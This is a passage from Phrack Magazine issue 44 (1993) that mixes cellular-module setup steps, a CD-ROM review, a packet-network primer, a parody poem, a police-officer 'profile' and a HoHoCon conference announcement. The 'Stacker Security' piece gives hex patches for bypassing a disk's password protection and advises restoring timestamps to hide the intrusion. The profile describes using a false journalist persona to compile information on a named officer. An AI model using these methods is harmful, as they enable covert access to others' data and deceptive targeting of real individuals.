SEND button on a cellular phone. This will place a voice call using the number in the dial box. 29. When call is complete tap "Hang-up" (the DIAL button to "Hang-up" after the call is connected to the network.) This is just like pressing END on a cellular phone. 30. Close EO Phone. 31. Programming and testing is now complete. Helpful Information The EO Cellular Module contains an OKI 910 cellular phone housed in specially designed, plated plastics with custom connections into the proprietary port on the phone. All programming of this module is done via the EO Personal Communicator 440 or 880. All programming/configuration information for the phone is stored in the EO Cellular Module and not in the Personal Communicator. This means that once the EO Cellular Module is programed it can be removed from the EO Personal Communicator and reattached to any other EO Personal Communicator without re-programming. The ESN for the EO Cellular Module can be derived from the Serial number in the window on the bottom of the module. The cellular module ESN is 129 followed by the last eight digits of the serial number in the window. These eight digits will usually begin with 013. This eleven digit number should be provided to the people that will actually assign the telephone number and activate the EO Cellular Module on the cellular network. ******************************************************************************* THE HACKER CHRONICLES CD-ROM Well, he said he was going to do it, and he did. Scan Man put out a CD-ROM of info collected from the underground. I had kind of forgotten he was going to do it, but once I heard rumors of such a thing, I knew he had. At HoHo Con last year, Bootleg was very excited about compiling data from the community for the project he and Scan Man were working on. As things progressed however, Bootleg would soon find out that Scan Man had no intention of working with him, and cut him out of the project. This is how it was explained to me. I hope that it is not true, since Bootleg is back in jail and wouldn't have the ability to fly out to West Virginia and throttle Scan Man about the head and neck. [Description from the Jewel Box] WARNING! This material is controversial in nature and may be offensive to some viewers. Not that the information in and of itself is not illegal. Quite often the usage of certain information is illegal. The Hacker Chronicles is for informative and educational purposes only. All documents and programs in this compilation were legally available to the public prior to his publication. None of these criminal acts described on this disc are in any way condoned or should be attempted. Over 12 YEARS in the making - this software package contains stories of how they did it, actual break-ins, arrests, and prosecutions. Most of the articles were written by the actual people who committed these acts. Access articles and software with an easy-to-use menu system. Areas of information include: PHONE PHREAKING (so called hobbyists who are into telephone technology of all types, well known for their ability to bypass telephone billing system), COMPUTER HACKERS (sometimes referred to as cyberpunks, interested in access to any on line computer system they can find), SATELLITE COMMUNICATIONS (hobbyists who sometimes employed test software designed for dealers to defeat scrambling systems), "UNDERGROUND" GENERAL INFORMATION (many subjects all very technical in nature and explained in detail, such as ATM's, credit cards, voice mail, hypnotism, bugging, skip tracing, phone taps, cellular phones, lock picking, social engineering, virus's, chemical substances, explosives, editorials, legal issues, alarm systems, spies, hardware, signal interception, private investigations, security, computer ethics, underground BBS's, TV cable piracy, boxing and much more! ----- Uh, that kinda says it all, don't it? CYBERPUNKS, VIRII, WAREZ & STUFF! Uh, yeah. Seriously, the disk itself has a shitload of files. This is rather cool, since now EVERY bbs in the world can put OVER 650 MEGS OF G-FILES! Heh. The file on the disc that struck me the most was the intro written by Scan Man. He went talked about a lot of things he's done in the past with the scene, telephone companies, etc. I know Scan Man from WAY back. Pirate-80 was one of the first real Hacker BBSes I was ever on. (Remember when it was only up certain hours of the day?) Reading that file was pretty informing for me. It also made me smile to see that he's still pissed off at Craig for tearing him apart in a Phrack some years ago. Remember, this is by no means a complete collection. Thankfully, the CD does not have any issues of Phrack magazine past issue 41 (or else, I would be enjoying a piece of the revenue :) ). It also, oddly enough, does not have any LOD-TJ other than 4. It DOES however have a large collection of CUD, NIA & CDC. Go figure. The files do represent a neat history of our community and for the curious neophyte, the nostalgic old-timer, or anyone with 39 bucks, it might be something worth picking up just to say you have it. I mean, you never know when you will need to find issue 12 of LOL, or plans for a urine box. It will save you the trouble of downloading. The Hacker Chronicles - A Tour of the Computer Underground should be available from any outlet that carries CD-ROMS. Or hell, call P-80. I'm sure Scan Man will sell you a copy: 304-744-7322. ******************************************************************************* Packet Switched Data Networks An Introduction and Overview By: Cosmos The abundance of networks both private and public has given the hacker an almost infinite playground. A popular type of network is the packet switched network like SprintNet (TELENET) that allows local users to access non-local machines. These WAN's usually serve as the backbone for many large corporations. Understanding the way in which they operate can aid many aspects of the hacker's knowledge. Packet switching is a data networking technology in which user data is segmented into small units (packets) and transmitted from the sending user to the receiving user over shared communications channels. Each individual packet also holds additional information that allows the network to correctly route the packet to the correct destination. The size of the packet is limited to a maximum number of characters set by the individual sender. Packets are measured in octets, which are 8-bit bytes. User data that exceeds this amount is divided into multiple packets. The difference between packet switching and circuit switching (regular telephone lines) lies in the use of virtual circuits. These circuits are given the term "virtual" because: 1) they are made up of bandwidth allocated on demand from a pool of shared circuits 2) no direct physical connection is made on a packet network 3) the connection is a logical one Due to these facts, packet networks are commonly denoted as connectionless networks. There are three types of packet networks: public, private, and hybrid (a combo of the two previous ones). A packet switched data network (PSDN) has five major components: 1) local access components (LAC) 2) packet assemblers/disassemblers (PAD) 3) packet switching nodes (PN) 4) network links (NL) 5) a network managment system (NMS) LOCAL ACCESS COMPONENTS To transmit data through a PSDN, the data must first move from the end-user to a packet assembler/dissasembler (PAD) or to a packet switching node with a built-in PAD function. In order to achieve this, three local access components are required. First is the end-user data terminal, or more plainly, your computer. Secondly, an end-user transmission device such as a modem. Thirdly, a local access facility or physical line (Telephone Line). There are three types of physical lines: switched analog lines (dial up), leased analog channels (private lines), and leased digital channels (DDS circuits). PACKET ASSEMBLERS/DISASSEMBLERS All data travelling through the PSDN must be routed through a Packet Assembler/Disassembler (PAD). The PAD's primary function is to translate user data into network packet format and conversely to convert network packets into user data. Basically, a PAD serves as the network translator between the user and the PSDN. Other functions performed by the PAD include: physical line concentration, call setup and clearing functions, protocol conversion, code conversion, protocol emulation, local switching functions, and local call billing functions. PACKET SWITCHING NODES The primary component of a packet switching network is the packet switching node (PN). The packet switching node ensures that each packet is routed properly through the network. Commonly, PN configurations are installed in a redundant configuration. This provides for a convenient backup for network traffic. Other functions include: call billing, internal network diagnostics, support of direct host computer access., and inter-network gateway connections. NETWORK LINKS Network links are the physical components that connect packet switching nodes together. Several transmission technologies can be employed in network linking, including: analog circuits, digital circuits, microwave systems, and satellite systems. The most common network link technologies used are Digital Dataphone and other similar interexchange carrier services, and point to point analog private lines. Speeds on network links range from 9.6 Kbps to 56/64 Kbps. Network links are commonly denoted as the "backbone layer" or the backbone packet network. The local PAD's are termed the "access layer" or access network. NETWORK MANAGEMENT SYSTEM Basically, the network management system (NMS) controls and monitors the PSDN. It primarily stores and performs maintenance on the network database. This database is the master copy of all the software and configurations in each network node. If a node fails or is not functioning properly, the NMS can download backup information through the various network links to solve the problem. Thus, a unattended network is formed. This is all one needs to understand for a general knowledge of a packet switched data network. Additional topics can be pursued further for increased knowledge but are not essential. You might want to research some info on the standard X.25 protocol, and other OSI stuff. Anyways, I hope this brief intro article can be of use in the general knowledge of computer networking. Cosmos ******************************************************************************* Stacker Security. How to Hack a Stacker disk that is password protected! The 'Stacker' Software increases the space on your hard disk by using on the fly compression on the data on the disk. It does this by creating a file called Stacvol.dsk on the hard drive. All of the information that is put on the disk is compressed and stored in the stacvol.dsk file. When Stacker is installed on a hard drive, say C: all of the data on the disk is compressed and stored in the stacvol.dsk file, which is assigned as a virtual disk C:, the 'real' drive is then assigned D:. The swapping taking place a boot time. The Stacvol.dsk file is therefore stored on the D: drive and usually takes up most of the drive. (ie: a 40M C: drive contains the stacvol.dsk file of size around 5-39M the disks are swapped at boot time and the C: drive that the user 'sees' is really the contents of the stacvol.dsk file on the D drive assigned to C:, everything on the C drive (stacvol.dsk) is compressed, thus obtaining an increased disk space.) The point is this, at boot time the owner of the machine can set passwords to allow the user to have no access, read/write or read-only access to the C drive/stacvol.dsk file, if a wrong password is entered the stacvol file is not mounted as the C drive and all a DIR will get you is a directory of C:\ which will have a few files such as command.com etc, nothing of any real interest. So now for the interesting bit, how to get in without a password, or getting read/write privs when you've only got read-only. First, boot the computer and go through the password routine. Get it wrong (you may as well try something like password though just in case.) The Stacvol.dsk file is hidden so change its file attributes so you can edit it. (You'll need a floppy now with a utility such as Norton diskedit on it) Load in the diskeditor and get it so that you are editing the stackvol file in a HEX mode. The first bit of Hex just contains the usual sort of boot record type rubbish, not too interesting. The interesting bit is the bit which starts at offset 74 Now the information starting at 00040 is the interesting bit, on a disk with a password set it will look like this.... 00040 20 20 20 20 20 20 20 20 | 20 20 2D 2A 2D 0A 0A 1A 00050 72 AA 91 9C 0F 66 9A ED | AB 18 6E 6D E2 C3 2B 8B 00060 5E CD EF A9 37 1B 53 E2 | C6 F0 E8 9C A4 49 F6 9D 00070 4C F0 AB 32 21 47 FC 91 | 7E 8C 58 D8 D9 D7 DB D3 (All figures obviously in hex.) The data from 0004B to 0004E is a flag to the device driver to tell it that a password is required. From 0004f to 0005F are the encrypted passwords. (the rest just being data) NOW, for an unpassworded file this looks like 00040 20 20 20 20 20 20 20 20 | 20 20 20 20 20 0D 0A 1A 00050 49 F6 9D 4E EC B1 26 3D | 0F 6B B2 24 41 07 7B 92 00060 XX XX XX XX XX XX XX XX | XX XX XX XX XX XX XX XX 00070 XX XX XX XX XX XX XX XX | XX XX XX XX XX XX XX XX Now all you have to do is take a copy of the data in this section on the stacvol.dsk file you are hacking so that you can return it back to its original state! Patch the code above into the corresponding positions into the file you are hacking, leaving the code denoted by XX alone, this is version code and depends on the machine so leave it alone! Save the changes and reboot the machine, it will no longer ask for a password and you now have full access. Afterwards re-patch the original code that you noted and if you've used your common sense then the owner will never know you were there. (By common sense I mean don't forget to restore time/date stamps etc.) D2A [D ******************************************************************************* UNAUTHORIZED ACCESS ONLY Computers are becoming an integral part of our everyday existence. They are used to store a multitude of information, from credit reports and bank withdrawals to personal letters and highly sensitive military documents. So how secure are our computer systems? The computer hacker is an expert at infiltrating secured systems, such as those at AT&T, TRW, NASA and the DMV. Most computer systems that have a telephone connection have been under seige at one time or another, many without their owner's knowledge. The really good hackers can re-route the telephone system, obtain highly sensitive coporate and government documents, download individuals credit reports, make free phone calls globally, read private electronic mail and corporate bulletins and get away without ever leaving a trace. So who are these hackers? Just exactly WHAT do they DO, and WHY do they do it? Are they really a threat? What do they do with the information they obtain? Are hackers simply playing an intellectual game of chess or are hackers using technology to effectively take control of corporate and government systems that have previously appeared omnipotent? Our group is in the course of filming "Unauthorized Access", a documentary that will demistify the hype and propoganda surrounding the computer hacker. We will expose the truths of this sub-culture focusing on the hackers themselves. This will be a view from inside the global underground. We intend to shoot in the United States, Holland and Germany. This documentary will be of the highest broadcast quality and is intended for international television, festival and theatrical distribution. We are currently looking for additional financial backers interested in this project. For more information about "Unauthorized Access" or if you are intrested in providing any information or support, please contact annaliza@netcom.com. ******************************************************************************* Mitnick's Soliloquy Intruder, or not Intruder: that is the question: Whether 'tis more likely the system suffers The misuses and malfeasances of outrageous crackers Or that some user behaves anomalously And, by so doing, causes false alarms. To alert, to audit; No more; and by an audit to say we find the attack, And the thousand failed login attempts That are seen on the network, 'tis a consummation Devoutly to be decrypted. To alert, to audit. To audit, perchance to detect, ay, there's the rub. For in that detection of attack what false alarms may come; When we have dumped a million packets Must give us pause, the analysis That makes use of long CPU hours and many gigabytes For who would bear the whips and scorns of time The analysis by hand, the tired SSOs eyes sore, The pangs of innocent users, the law's delay, The insolence of phreaks, and the spurns That patient merit of unworthy takes When he himself might his quietus make By a disconnected ethernet? who would fardles bear To grunt and sweat under C2 standards But that the dread of worm after worm The undiscovered bug from whose bourn No Vandal turns, puzzles the testers, And makes us rather ebar those ills we have That crash the system and erase the hard drive? Thus intrusion detection makes abusers of us all, And thus the native hue of normal use Is sicklied over with the red light of intruder, and jobs of great size and duration With this regard their patterns out of normal parameters, and lose the name of legal system policy. After Hamlet's Soliloquy, By JJ ******************************************************************************* ==Phrack Magazine== Volume Four, Issue Forty-Four, File 5 of 27 **************************************************************************** Computer Cop Prophile by The Grimmace The following file is something I thought of and did a LOT of research on before writing. It's something that I haven't seen in PHRACK and I've been a devout fan of this zine since the beginning. The "PHRACK PROPHILES" on hackers and phreakers give readers an insight into the movers and shakers of the P/H world, but how about a profile or profiles on the anti-hacker/phreaker establishment that seems to be growing by leaps and bounds lately? In the past years we've seen cops and feds who know nothing about computers and/or telephone systems bungle their way through search warrants and arrests and have had some good laughs at their expense. But now it seems that the "computer cops", the feds especially, are putting a big push on training agents in the "tricks of the trade" and their conviction rate is getting better. The primary source of this training is the Federal Law Enforcement Training Center in Glynco, Georgia, where they're teaching computer seizure and analysis techniques, computer-targeted search warrants, and telecommunications fraud investigations. (They're very accommodating about giving out information on the phone as long as you tell them you're a cop). The FBI Academy in Quantico also has a computer crimes course. On the technical side of things, there's an organization called IACIS which stands for the International Association of Computer Investigative Specialists based in Portland, Oregon, and which consists of members of both local law enforcement agencies nationwide as well as various and sundry federal agencies. This group teaches and certifies cops in how to get evidence from computer systems that can't be attacked in court (Of course, anything CAN be attacked, but getting the evidence squashed is not always a sure thing unless the judge is a computerphobe). As much satisfaction as we've gained at the expense of the US Secret Service from the Steve Jackson Games case, it's widely publicized problems may prove to be a double-edged sword hanging over our heads. Law enforcement learned a LOT of lessons from mistakes made in that investigation. Like most of you, I've spent a lot of years exploring computer systems (usually those belonging to others) and personally feel that I've done nothing wrong (know the feeling?). I'm sure others across the country also can conduct a little socially-engineered reconnaissance and get the lowdown on some of the people we NEVER want to see knocking on our doors with a sledge hammer in the middle of the night. This profile contains information on the ONLY computer crime cop I could identify in the Louisville/Jefferson County area after calling all the major departments posing as a writer for a law enforcement magazine doing a survey. Information about him was obtained not only from his department, but from sources in the local and federal court systems, Ma Bell Security, and the Federal Law Enforcement Training Center. Lt. Baker is *not* a potential donor to the CPSR or EFF to say the least. I'm currently compiling similar information on other law enforcement types in the Secret Service, Columbus Ohio PD, Dallas PD, Georgia Bureau of Investigation and members of Ma Bell's Data Security Group in Atlanta. Baker was just the closest to me so I started with him. If I can get the information I've requested, then future submissions will also include lesson plans furnished by FLETC on their training courses and analysis protocols suggested by the USSS...heh...heh. Yours, The Grimmace *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* COMPUTER-COP PROFILE I LT. BILL BAKER JEFFERSON COUNTY POLICE DEPARTMENT LOUISVILLE, KENTUCKY INFORMATION COMPILED BY: ** THE GRIMMACE ** *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* NAME: Bill Baker RANK: Lieutenant AGENCY: Jefferson County Police Department 768 Barret Ave. Louisville, Kentucky 40204 AGE: 43 YEARS OF COMPUTER EXP: 13 YEARS AS A COP: 18 YEARS IN COMPUTER/ TELECOM CRIME: 8 TRAINING: Federal Law Enforcement Training Ctr. Glynco, Ga. - Telecommunications Crime Telecom Fraud Cellular Fraud PBX Fraud - Computer Crime Illegal Access Crimes Computer Crime Inves. Seized System Analysis FBI Academy Quantico, Va. - Computers in Narcotics Investigations - Computer Crime Investigations National Intelligence Academy Ft. Lauderdale, Fl. - Supervising Intelligence Operations Surveillance Techniques Electronic Tracking Electronic Eavesdroping Video Evidence Techniques - Telephone Systems Wiretaps Dialed Number Recorders Pager/Fax Intercepts Technical Telephony Course PREVIOUS ASSIGNMENTS: Patrol Criminal Investigations/Burglary Criminal Investigations/Homicide Crime Prevention Special Investigations/Vice-Intel MEMBER: Communications Fraud Control Association Washington, D.C. PUBLICATIONS: Various computer/telecommunications crime oriented articles for assorted law enforcement and computer industry magazines (i.e., POLICE CHIEF, DATA TODAY) Posing as a freelance writer from the "Law Enforcement Journal", I made calls to local police agencies all over this area asking about their Computer Crime Units and received replies ranging from "What are you talking about?" to "Maybe FRAUD handles that...hey, Charlie...do the FRAUD guys do anything with compoooters?". So much for the Louisville Division of Police...no fear there, right? But I decided to push on since Louisville, though not a hotbed of phreakers/hackers, IS the latest home of TAP MAGAZINE (a la Blitzkrieg BBS and the Predat0r) and has a smattering of "hometown" folks engaged in less than legal activities through the local phone lines. The call made to the Jefferson County Police got me a solid response of "You'll have to talk to Lt. Bill Baker. Hey, Charlie, where's Lt. Baker working now?" (This guy is so low key his own department doesn't even know where he works!) They finally decide he's someplace called "Adam Station" and through "various" contacts and a friendly local attorney who rarely pays for telephone calls himself, I managed to obtain quite a bit of information about Lt. Baker and his obviously misguided quest. Lt. Baker is fairly typical of the "new breed" of high-tech investigator currently being churned out by the various federal training schools. He's aggressive and, from talking to other members of his department, thought of as a "computer weenie" who was probably a hacker himself before he embraced the "dark side" of "the FORCE". (I personally believe that this may be more fact than fantasy after talking to him on the phone since he seems to know more about phreaking and hacking than one would think would be taught in the aforementioned federal institutes of higher learning.) I finally managed to speak with Lt. Baker on the phone and gave him my "writing about computer crime" rap which he bought with little suspicion. The following are excerpts from the recording I made of the conversation [comments in brackets are mine]: TG: How would you rate the progress of computer and telecommunications crime investigations in this area? Baker: There have been some good cases made here, but there's still a long way to go. The main problem is that there hasn't been a push from local businesses in this area to combat these types of crimes. Most of'em don't want to admit they've been hit from the outside. If there's no complaints, then the departments aren't likely to want to spend the money to dig up additional crime, right? TG: Of the hackers you've worked on, what kind of capabilities do they have and how good do you think they are? Baker: Well, hackers and phreaks are like any other cross-section of a criminal group...there are some that are very good and some that are pitiful. The best thing you can say about working hacker/phreaker cases is that a lot of them catch themselves. They have huge egos and tend to brag a good deal about what they've done and how they did it. TG: Does that mean that you don't think a computer crime investigator has to be as good as the criminals he chases...I mean, because a lot of these people leave so many clues behind? How would you rate your ability in this field? Baker: Nope...not at all. I think that as technology gets better so will the crooks. Let's keep the record straight here. Sure, there are bozos out there who read a how-to file in an old PHRACK and decide that they have the knowledge they need to nuke the phone company or ride a VAX like a Hell's Angel rides a Harley. Those are the easy ones. The ones who -write- [author's emphasis] the technical articles in PHRACK are the ones to worry about. There are some stomp-down [??] incredibly knowledgeable individuals in circulation blasting away with their modems at any target of opportunity. TG: You didn't mention your own ability for investigating these people. Baker: (Laughs) Yeah, well...let's say I know enough to get by and am smart enough to know that there are no absolute experts. TG: How would you comment on the Steve Jackson Games case? Do you think the Secret Service set a lot of bad precedents? Baker: (Laughs) Noooooooo....sorry, pal. That's been jawed to death in every phreak/hack mag, legal journal, and Internet newsgroup in existence and I'm not about to stick my neck out on that one, OK? I will say that everyone learned a lot from that case and I seriously doubt if you'll see the same set of problems reoccurring in future cases. Maybe the CSPR or EFF hired guns can come up with a new group of loopholes, in which case we'll have to find new ways to circumvent those attacks. TG: You sound a little critical of the EFF and CSPR efforts in their defense of so-called "computer criminals". Baker: Well, I'm sure that they believe in what they're doing. They must to invest that much cash and energy. But I think there has to be some middle ground agreed upon rather than just whining about "all information should be free" and "if I can get into your system then I should be allowed to look around". I'm not going to launch into a diatribe on organizations that I don't agree with. I'm simply going to work harder at dotting every "i" and crossing every "t" to make my cases more secure. Stealing telephone service is a crime, defrauding businesses is a crime, gaining unauthorized access into someone else's computer system is, in most states, a crime, and even if there's no law on the books making it a crime, it's wrong. TG: Since by your own statement, you feel that high-tech crime investigation is still in its infancy, what groups or organizations would you say are in the lead in trying to combat this type of crime? Baker: The most significant two I know are the Federal Law Enforcement Training Center in Glynco, Georgia, and the Communications Fraud Control Association based out of Washington, D.C. FLETC [he pronounces it FLET-SEE] probably has the finest computer crimes training program in the country. They bring in acknowledged experts and don't cut the students any slack as far as learning to do things correctly and, most importantly, legally. The CFCA is the leader in Telecommunications security and provide training and assistance to telecom and computer companies along with law enforcement agencies all over the country. TG: Why do you think so few law enforcement agencies know anything about computer crime investigations? Are they going to leave the phreaks to the feds? Baker: Nah...I don't think you can simplify it that easily. Most departments don't have dedicated computer crime units because of lack of funds to support such a unit, lack of trained personnel, lack of understanding of the magnitude of the problem, fear of increasing their crime stats or any combination of those reasons. When I first got into this, there weren't any experts. John Maxfield and his BOARDSCAN operation got a lot of talk in the hack/phreak journals and there were a small handful of others, but no real standout authorities. I talked to an awful lot of people before I hooked up with Clo Fleming at SPRINT Security who helped me a lot. TG: Do you still trade information with SPRINT? Baker: I have contacts with all the major telecom carriers. The training I got at FLETC really helped make some valuable contacts. But I guess SPRINT and Clo Fleming would be my first choice simply because they were willing to help me when no one else would. You can't operate in this environment without contacts in the OCC's. It can't be done and the OCC's [Other Common Carriers] are a lot more willing to assist law enforcement now than they were in 1985. Of course, the telecommunications industry is taking a $4-5 billion hit a year from fraud and that has a lot to do with it. TG: Do you subscribe to the hacker/phreaker magazines? Baker: Sure...I subscribe to 2600 and get copies of some others. I think PHRACK's probably the best overall, but I can't afford the subscription rate they've imposed on government agencies since Craig Neidorf took the hit for publishing the "golden" E911 document. I've learned a ton of stuff over the years from PHRACK and wish it were still free, but they have a right to their info just like the people who own the systems attacked by hackers. It'd be kind of hypocritical for me to rip off PHRACK and then turn and prosecute some other guy for ripping off information from another source, right? TG: What problems do you foresee in the future in computer and telecom crime investigations? Baker: Jeez...why don't you ask me when we'll have world peace or something easy? OK, I think we'll probably see the larger departments being forced to play catch-up with the current trends and always being a little behind in this area. I also think you'll see more officers losing cases and being sued, a la SJG, until they get the specific training required to handle these cases the right way. Turning seized systems over to the local "computer guy" in the department is going to cost'em in the long run because every lawyer who gets one of these cases is going to compare it bit by bit with the SJG case to see if there's anything there he can use for his client's defense. TG: There has been a lot of discussion about whether or not computer systems should be seized rather than just making copies of the data for evidence. What is your policy on equipment seizures when working cases like this? Baker: First of all, I don't go on fishing expeditions with search warrants. If I have enough to convict a guy then I get the warrant. I take everything that's there and do the analysis. I've had cases where the defendant has requested copies of data he needed for various reasons and I've had no problems with furnishing them as long as the request is reasonable. I ask for forfeiture of the equipment if I can link it to the crime because the law says I can. If I can't link the computers, then I give them back...simple as that. I think it's kind of interesting that most hackers or phreaks will refuse to take a guilty plea for a reduced charge, even if I have them stone cold and they're looking at a 99.999999% chance of conviction in a jury trial, if it means they'll lose their equipment in the deal. It makes good leverage in certain situations. TG: Did you have any part in Operation Sun-Devil? Baker: Nope. Though I'd have liked to. I was on a lot of the systems taken down in Sun-Devil. TG: You said you were on some of the systems busted in the Sun-Devil operation, are you still on phreak/hack boards and would you name any? Baker: (Laughs a lot) I think I'll pass on naming systems I'm on, OK? That'd be cheating. (Laughs again) But I get around enough to know what's going on. There are lots of investigators out there calling the boards. TG: I appreciate your time, Lt. Baker, and would like to ask one last question. What motivates you in these cases since the alleged "theft" involves pretty intangible property? Baker: Motivation? Hmmmm...I suppose you could say it's the chase that motivates me more than the catch, though the catch is pretty good, too. These cases tend to be more one-on-one than some other types and the adversaries can be very good at covering their tracks. Hell, I probably have more in common with the people I target than they'd like to believe. As for the "intangibility" of the stolen goods, well, that's why we have court systems, isn't it...to define those little details. TG: A lot of computer crime investigators would rather stay in the background, but you don't seem to have taken that position. Why not? Baker: Well, like anyone involved in anything relatively new, as opposed to the old standard type crimes like murder and armed robbery, it's to my benefit to have anything printed informing people of the problems created by this type of activity. We all pay the price for telecom fraud, credit card fraud, data loss due to illegal access to computers and all the rest. But the people involved in these crimes, for the most part, don't exhibit the same profiles as the so-called "violent" criminals. In fact, I've had some very friendly conversations with a number of phreaks and hackers. Investigators who have problems would probably have them no matter what crimes they were investigating. I never assume that I'm smarter than anyone I'm chasing and I don't rub their noses in it when I make a case. Just like I don't lose sleep when I just can't seem to get that last piece of the puzzle and one gets away. It's hide-and-seek in cyberspace. Pretty good game, actually. For what it's worth, there it is. The interview printed here doesn't contain a lot of the bullshit that was thrown back and forth during our conversation, just the relevant details which tend to give an insight into this guy. Frankly, I was impressed by the fact that he didn't seem anything like I had expected after reading horror stories about other agencies and investigators. This guy was personable and maybe that's an indicator that he's dangerous. Never, ever underestimate your opponents -- even if they do sound like "good ole boys" and talk to you like you're the best friend they ever had. Always remember that COPS INVENTED SOCIAL ENGINEERING! My next "computer cop" profile will deal with a rising star in the U.S. Secret Service and his connections to the Guidry Group, a consulting organization working for the cellular phone industry in combating cellular fraud. ==Phrack Magazine== Volume Four, Issue Forty-Four, File 6 of 27 Conference News Part I **************************************************************************** [Official Announcement / Call For Participation] (Distribute Freely) dFx, Phrack Magazine and cDc - Cult Of The Dead Cow proudly present : The Fourth Annual H O H O C O N "Cliff Stoll My K0DEZ!@$#!" Who: All Hackers, Journalists, Security Personnel, Federal Agents, Lawyers, Authors, Cypherpunks, Virtual Realists, Modem Geeks, Telco Employees, and Other Interested Parties. Where: Austin North Hilton & Towers and Super 8 Motel 6000 Middle Fiskville Road Austin, Texas 78752 U.S.A. Hilton : (800) 347-0330 / (512) 451-5757 Super 8: (800) 800-8000 / (512) 467-8163 When: Friday December 17 through Sunday December 19, 1993 What is HoHoCon? ---------------- HoHoCon is the largest annual gathering of those in, related to, or wishing to know more about the computer underground. Attendees generally include some of the most notable members of the "hacking" and "telecom" community, journalists, authors, security professionals, lawyers, and a host of others. Previous speakers include John Draper (Cap'n Crunch), Ray Kaplan, Chris Goggans (Erik Bloodaxe), Bruce Sterling, and many more. The conference is also one of the very few that is completely open to the public and we encourage anyone who is interested to attend. Hotel Information ----------------- The Austin North Hilton recently split its complex into two separate hotels; the Hilton and the newly added Super 8. HoHoCon guests have the choice of staying in either hotel. Group rates are as followed : Super 8: Single - $46.50, Double - $49.50, Triple - $52.50, Quad - $55.50 Hilton : Single - $69.00, Double - $79.00, Triple - $89.00, Quad - $99.00 Once again, the hotel has set aside a block of rooms for the conference and we recommend making your reservations as early as possible to guarantee a room within the block, if not to just guarantee a room period. Rooms for the handicapped are available upon request. To make your reservations, call the number listed above that corresponds with where you are and where you want to stay and make sure you tell them you are with the HoHoCon conference or else you'll end up throwing more money away. The hotel accepts American Express, Visa, Master Card, Discover, Diner's Club, and Carte Blanche credit cards. Check-in is 3:00 p.m. and check-out is 12:00 noon. Earlier check-in is available if there are unoccupied rooms available. Please note that in order for the hotel to hold a room past 6:00 p.m. on the date of arrival, the individual reservation must be secured by a deposit or guaranteed with one of the credit cards listed above. Also, any cancellations of guaranteed reservations must be made prior to 6:00 p.m. on the date of arrival. You will be responsible for full payment of any guaranteed reservations which are not cancelled by this time. The hotel provides transportation to and from the airport and will give you full information when you make your reservations. Directions ---------- For those of you who will be driving to the conference, the following is a list of directions provided by the hotel (so, if they're wrong, don't blame me): Dallas : Take IH 35 south to exit 238-B, the Houston exit. At the first stop light, turn right on to 2222. Turn off of 2222 onto Clayton Lane (by the Greyhound Station). At the stop sign, turn right onto Middle Fiskville, the hotel is on the left. San Antonio : Take IH 35 north to exit 238-B, the Houston exit. At the second stop light, turn left onto 2222. Turn off 2222 onto Clayton Lane (by the Greyhound Station). At the stop sign, turn right onto Middle Fiskville, the hotel is on the left. Houston (on 290) : Take 290 west into Austin. Exit off of 290 at the IH35 exit (do not get on 35). Stay on the access road heading west, you will pass two stop lights. Turn off the access road onto Clayton Lane (by the Greyhound Station). At the stop sign, turn right onto Middle Fiskville, the hotel is on the left. Houston (on 71) : Take 71 west into Austin. Exit onto 183 north. Take 183 north to 290 west. Take 290 west to the IH 35 exit. Exit off of 290 at the IH 35 exit (do not get on 35). Stay on the access road heading west, you will pass two stop lights. Turn off the access road onto Clayton Lane (by the Greyhound Station). At the stop sign, turn right onto Middle Fiskville, the hotel in on the left. Airport : Exit the airport parking lot and turn right onto Manor Road. Take Manor Road to Airport Boulevard and turn right. Take Airport Boulevard to IH 35 north. Take IH 35 to exit 238-B. At the second stop light, turn left onto 2222. Turn off of 2222 onto Clayton Lane (by the Greyhound Station). At the stop sign, turn right onto Middle Fiskville, the hotel is on the left. Call the hotel if these directions aren't complete enough or if you need additional information. Conference Details __________________ HoHoCon will last 3 days, with the actual conference being held on Saturday, December 18 starting at 11:00 a.m. and continuing until 5 p.m. or earlier depending on the number of speakers. Although a few speakers have confirmed their attendance, we are still in the planning stages and will wait until the next update to release a speaking schedule. We welcome any speaker or topic recommendations you might have (except for, say, "Why I Luv Baked Potatos On A Stik!"), or, if you would like to speak yourself, please contact us as soon as possible and let us know who you are, who you represent (if anyone), the topic you wish to speak on, a rough estimate of how long you will need, and whether or not you will be needing any audio-visual aids. We would like to have people bring interesting items and videos again this year. If you have anything you think people would enjoy having the chance to see, please let us know ahead of time, and tell us if you will need any help getting it to the conference. If all else fails, just bring it to the con and give it to us when you arrive. Any organization or individual that wants to bring flyers to distribute during the conference may do so. You may also send your flyers to us ahead of time if you can not make it to the conference and we will distribute them for you. Left over flyers are included with information packets and orders that we send out, so if you want to send extras, go ahead. Cost ---- Unlike smaller, less informative conferences, we do not ask you to shell out hundreds of dollars just to get in the door, nor do we take your money and then make you sleep in a tent. We are maintaining the motto of "give $5 if you can", but due to the incredibly high conference room rate this year, we may step up to "$5 minimum required donation" or "give us $5 or we'll smash your head in". Five dollars is an outrageously low price compared to the suit infested industry conferences or even the new "Cons are k00l and trendy, I gotta do one too!" conferences that are charging up to $50 for admission alone. To encourage people to donate, we will once again be having our wonderless "Raffle For The Elite" during the conference. We will issue a prize list in a future update, but we can guarantee that this year there will be a lot more (and better) prizes than last year, including a full system (and, no, it's not a c64 or 286). Anyone who wishes to donate worthwhile items to the raffle, please let us know ahead of time, or if it's a last minute acquirement, just bring it to the conference. Miscellaneous Notes ------------------- To save myself some time by mailing responses to a lot of the same questions I expect to get, I'll answer a few of them here. Although I have not talked to him myself yet, Steve Ryan has told me that Bruce Sterling will indeed be in attendance and may say a few words. As far as I know, there will not be any visitors from any other planets at the conference. Scot Chasin is still on Earth and will be making an appearance. Video cameras will *not* be allowed inside the conference room without prior consent due to previous agreements made with speakers who do not wish for certain parts of their speech to be rebroadcast. Still cameras and Etch-A-Sketch's are fine and tape recorders are too easily hidden for us to be able to control. Videos and T-Shirts from last year's conference are still available, and will also be on hand during the conference. We do not handle the LoD World Tour shirts, but I can tell you that the old ones are gone and a *new* LoD shirt will be unveiled at the conference. The HoHoCon shirts are $15 plus $3 shipping ($4.00 for two shirts). At this time, they only come in extra large. We may add additional sizes if there is a demand for them. The front of the shirt has the following in a white strip across the chest: I LOVE FEDS (Where LOVE = a red heart, very similar to the I LOVE NY logo) And this on the back: dFx & cDc Present HOHOCON '92 December 18-20 Allen Park Inn Houston, Texas There is another version of the shirt available with the following: I 